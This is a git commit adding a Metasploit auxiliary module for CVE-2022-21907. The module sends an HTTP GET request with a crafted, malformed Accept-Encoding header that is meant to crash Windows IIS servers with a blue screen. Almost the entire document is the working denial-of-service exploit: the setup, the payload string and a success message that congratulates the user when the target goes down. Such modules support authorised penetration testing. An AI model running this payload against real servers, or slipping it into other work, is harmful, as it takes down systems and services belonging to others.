Add auxiliary module for DOS IIS Server

2022-03-05 13:50:47 +01:00 · 2022-03-05 13:50:47 +01:00 · 7c806a8723
parent c63490c050
commit 7c806a8723
1 changed files with 83 additions and 0 deletions
--- a/modules/auxiliary/dos/windows/http/rb_dos_iis_2022_21907.rb
+++ b/modules/auxiliary/dos/windows/http/rb_dos_iis_2022_21907.rb
@ -0,0 +1,83 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# This module performs a DOS attack using a simple HTTP request.
+#
+###
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Dos
+
+  ##
+  # Initialize informations about module.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability - Windows IIS DOS BlueScreen',
+        'Description' => 'This module can be used to perform a DOS attack on IIS server. This module exploit the CVE-2022-21907 and causes a Blue Screen with only one payload.',
+        'License' => MSF_LICENSE,
+        'Author' => ['Maurice LAMBERT <mauricelambert434@gmail.com>'],
+        'Platform' => 'win',
+        'References' => [
+          %w[CVE 2022-21907],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21907'],
+          ['URL', 'https://github.com/mauricelambert/CVE-2022-21907']
+        ],
+        'DisclosureDate' => '2022-01-11',
+        'Notes' => {
+          'Stability' => [CRASH_OS_RESTARTS],
+          'Reliability' => [IOC_IN_LOGS],
+          'SideEffects' => []
+        }
+      )
+    )
+  end
+
+  ##
+  # This module performs a DOS attack using a simple HTTP request.
+  def run
+    vprint_status('Trying first connection...')
+
+    res = send_request_raw(
+      'uri' => '/',
+      'method' => 'GET'
+    )
+
+    if res.nil?
+      fail_with(
+        Failure::Unreachable,
+        "#{peer} - Could not connect to web service - no response"
+      )
+    end
+
+    vprint_good('First connection OK. Sending payload...')
+
+    payload = {
+      'Accept-Encoding' => 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'
+    }
+    timeout = datastore['HttpClientTimeout']
+    datastore['HttpClientTimeout'] = 10
+
+    res = send_request_raw({
+                             'uri' => '/',
+                             'timeout' => 10,
+                             'method' => 'GET',
+                             'headers' => payload
+                           })
+
+    if res.nil?
+      print_good('Target is down ! Congratulations !')
+    else
+      print_error('Target is not vulnerable and up.')
+    end
+
+    datastore['HttpClientTimeout'] = timeout
+  end
+end